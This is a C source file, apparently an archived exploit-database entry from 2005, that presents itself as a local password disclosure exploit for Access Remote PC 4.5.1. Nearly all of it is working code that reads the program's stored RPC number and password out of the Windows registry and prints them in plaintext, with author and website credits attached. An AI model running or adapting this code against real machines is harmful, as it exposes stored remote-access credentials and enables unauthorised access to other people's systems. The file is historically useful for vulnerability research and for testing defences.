69 lines
No EOL
2.1 KiB
C
69 lines
No EOL
2.1 KiB
C
/*****************************************************************
|
|
|
|
Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan
|
|
|
|
Application: Access Remote PC 4.5.1 (and probably prior versions)
|
|
Vendor: www.access-remote-pc.com
|
|
|
|
Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
|
|
to local users.
|
|
|
|
Discovered & Coded by: Kozan
|
|
Credits to ATmaCA
|
|
Web : www.netmagister.com
|
|
Web2: www.spyinstructors.com
|
|
Mail: kozan@netmagister.com
|
|
|
|
*****************************************************************/
|
|
|
|
#include <windows.h>
|
|
#include <stdio.h>
|
|
|
|
#define BUF 100
|
|
|
|
int main()
|
|
{
|
|
HKEY hKey;
|
|
char RPCNumber[BUF], Password[BUF];
|
|
DWORD dwBuf = BUF;
|
|
|
|
if( RegOpenKeyEx( HKEY_CURRENT_USER,
|
|
"Software\\Access Remote PC\\Client\\Options\\Proxy",
|
|
0,
|
|
KEY_QUERY_VALUE,
|
|
&hKey
|
|
) !=ERROR_SUCCESS )
|
|
{
|
|
fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
|
|
return -1;
|
|
}
|
|
|
|
if( RegQueryValueEx( hKey,
|
|
"RPCNumber",
|
|
NULL,
|
|
NULL,
|
|
(BYTE *)&RPCNumber,
|
|
&dwBuf
|
|
) != ERROR_SUCCESS )
|
|
lstrcpy( RPCNumber,"Not Found!\n" );
|
|
|
|
if( RegQueryValueEx( hKey,
|
|
"Password",
|
|
NULL,
|
|
NULL,
|
|
(BYTE *)&Password,
|
|
&dwBuf
|
|
) != ERROR_SUCCESS )
|
|
lstrcpy( Password,"Not Found!\n" );
|
|
|
|
fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
|
|
fprintf( stdout, "Credits to AtmaCA\n" );
|
|
fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
|
|
fprintf( stdout, "kozan@netmagister.com\n\n" );
|
|
fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
|
|
fprintf( stdout, "Password\t: %s\n", Password );
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2005-07-04]
|